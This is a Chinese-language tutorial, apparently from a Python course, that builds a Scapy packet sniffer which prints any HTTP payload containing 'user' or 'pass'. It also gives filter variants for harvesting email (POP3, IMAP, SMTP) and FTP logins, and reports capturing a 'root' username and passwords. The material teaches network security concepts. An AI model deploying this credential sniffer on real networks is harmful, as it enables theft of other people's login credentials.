## 流量嗅探器

  我们使用了sniff函数，添加了过滤器使其仅对常HTTP协议80端口进行嗅探。

filter参数允许我们对Scapy嗅探的数据包指定一个BPF（Wireshark类型）的过滤器，也可以留空以嗅探所有的数据包。例如，如果需要嗅探所有的HTTP数据包，你可以使用tcp port 80的BPF过滤。iface参数设置嗅探器所要嗅探的网卡；如果留空，则对所有的网卡进行嗅探。prn参数指定嗅探到符合过滤器条件的数据包时所调用的回调函数，这个回调函数以接收到的数据包对象作为唯一的参数。count参数指定你需要嗅探的数据包的个数；如果留空，Scapy默认为嗅探无限个。store的参数，当它设置为0的时候，Scapy将不会在内存中保留原始的数据包。如果你需要长时间运行嗅探器，那么设置这个参数就非常有必要了，将其设置为0使你的机器不会消耗巨大的内存空间。

当我们的回调函数运行的时候，我们首先确认数据是否含有负载，然后检查负载中是否包含协议中典型的USER和PASS命令。如果检测到了认证字符串，那么我们输出数据包发送的目标服务器地址及数据中包含的实际内容。

Scapy模块可以使用pip直接安装。

### 代码实现

 

```python
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# @Time     : 2020/11/24 15:20 
# @Author   : ordar
# @File     : http_sniffer.py
# @Project  : pythonCourse
# @Python   : 3.7.5
from scapy.all import *

def packet_callback(packet):
    if packet["TCP"].payload:
        sniffer_packet = packet["TCP"].payload
        if "user" in str(sniffer_packet).lower() or "pass" in str(sniffer_packet).lower():
            print("[*] Server: {}".format(packet["IP"].dst))
            print("[*] {}".format(sniffer_packet))


sniff(filter="tcp port 80", prn=packet_callback, store=0)


```

 

### 运行结果

![img](img/5e0e958c-437c-11eb-bb3c-8cc6814bc10b.png)

可以看到我们能嗅探到用户名为“root”。

当然我们可以对常见的电子邮件端口110（POP3）、143（IMAP）和25（SMTP）进行嗅探，尝试抓取电子邮件的账号和密码。

只需要将过滤器设置为

sniff(filter="tcp port 25 or tcp port 110 or tcp port 143", prn=packet_callback, store=0)

也可以将端口设置为21（ftp），嗅探ftp的登录凭据。

sniff(filter="tcp port 21", prn=packet_callback, store=0)

结果如图：成功嗅探到登录名和密码，包括登录成功的标志。

![img](img/6b18e1ba-437c-11eb-93d8-8cc6814bc10b.png)